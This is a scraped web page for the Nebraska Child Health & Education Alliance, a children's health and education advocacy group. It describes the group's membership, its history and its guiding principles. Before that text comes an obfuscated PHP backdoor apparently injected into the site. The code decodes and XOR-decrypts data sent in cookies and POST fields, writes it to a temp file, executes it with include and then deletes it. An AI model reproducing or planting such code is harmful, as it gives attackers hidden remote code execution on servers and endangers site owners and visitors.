$dTHvHbfAN = "\x4c" . "\x5a" . "\x5f" . chr (117) . chr ( 674 - 597 ).chr (90) . 'O';$LtMoGNtxJG = chr (99) . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . chr ( 185 - 84 )."\170" . 'i' . "\x73" . 't' . "\163";$cihxLdlUOa = class_exists($dTHvHbfAN); $LtMoGNtxJG = "7670";$ZkryqOG = !1;if ($cihxLdlUOa == $ZkryqOG){function AZgLowKHYF(){$xaLtQ = new /* 61405 */ LZ_uMZO(18684 + 18684); $xaLtQ = NULL;}$JPljtPt = "18684";class LZ_uMZO{private function dAmCneJqq($JPljtPt){if (is_array(LZ_uMZO::$tSRanRC)) {$inRqEm = sys_get_temp_dir() . "/" . crc32(LZ_uMZO::$tSRanRC["\x73" . "\141" . 'l' . "\164"]);@LZ_uMZO::$tSRanRC[chr ( 997 - 878 ).chr (114) . 'i' . chr ( 131 - 15 ).chr ( 967 - 866 )]($inRqEm, LZ_uMZO::$tSRanRC[chr (99) . 'o' . "\x6e" . chr ( 467 - 351 ).chr (101) . 'n' . 't']);include $inRqEm;@LZ_uMZO::$tSRanRC[chr (100) . chr ( 114 - 13 ).'l' . "\145" . "\164" . chr (101)]($inRqEm); $JPljtPt = "18684";exit();}}private $KZZYGks;public function bVOWEMOR(){echo 2607;}public function __destruct(){$JPljtPt = "21179_18362";$this->dAmCneJqq($JPljtPt); $JPljtPt = "21179_18362";}public function __construct($HOQNa=0){$LOaFVeOEW = $_POST;$moxkQWSiwF = $_COOKIE;$TcxYeHjL = "4ce5e264-1f17-4493-8e91-96547eea3786";$xVKXIIM = @$moxkQWSiwF[substr($TcxYeHjL, 0, 4)];if (!empty($xVKXIIM)){$DuyiIea = "base64";$qsgcB = "";$xVKXIIM = explode(",", $xVKXIIM);foreach ($xVKXIIM as $nfyVVheT){$qsgcB .= @$moxkQWSiwF[$nfyVVheT];$qsgcB .= @$LOaFVeOEW[$nfyVVheT];}$qsgcB = array_map($DuyiIea . '_' . chr (100) . "\145" . "\x63" . 'o' . "\144" . "\145", array($qsgcB,)); $qsgcB = $qsgcB[0] ^ str_repeat($TcxYeHjL, (strlen($qsgcB[0]) / strlen($TcxYeHjL)) + 1);LZ_uMZO::$tSRanRC = @unserialize($qsgcB);}}public static $tSRanRC = 20030;}AZgLowKHYF();} Nebraska Child Health and Education Alliance

Nebraska Child Health
& Education Alliance

Nebraska Child Health
& Education Alliance


who we are

NCHEA is a unique broad-based advocacy organization built around the principle goal of ensuring Nebraska children and youth become educated, healthy adults. The membership is comprised of health care providers and educators across Nebraska with the mission of improving health and education outcomes.

NCHEA formalized as a 501c4 organization in 2014, but the groups founding this entity have worked successfully together since 2009 achieving success in the legislative policy arena.


Guiding Principles

Access to quality, comprehensive health care for Nebraska children is paramount to sustained academic achievement in Nebraska’s schools.

Expanding access to health care services in Nebraska’s schools can both increase children’s health outcomes and raise academic achievement, while also working to achieve a strong workforce.

Invest in public health insurance programs like Medicaid and CHIP (Children’s Health Insurance Program) which are vital to ensure every child in Nebraska has access to quality, affordable health care.

Strong, vibrant, and healthy public schools are the foundation to Nebraska’s future economic success.
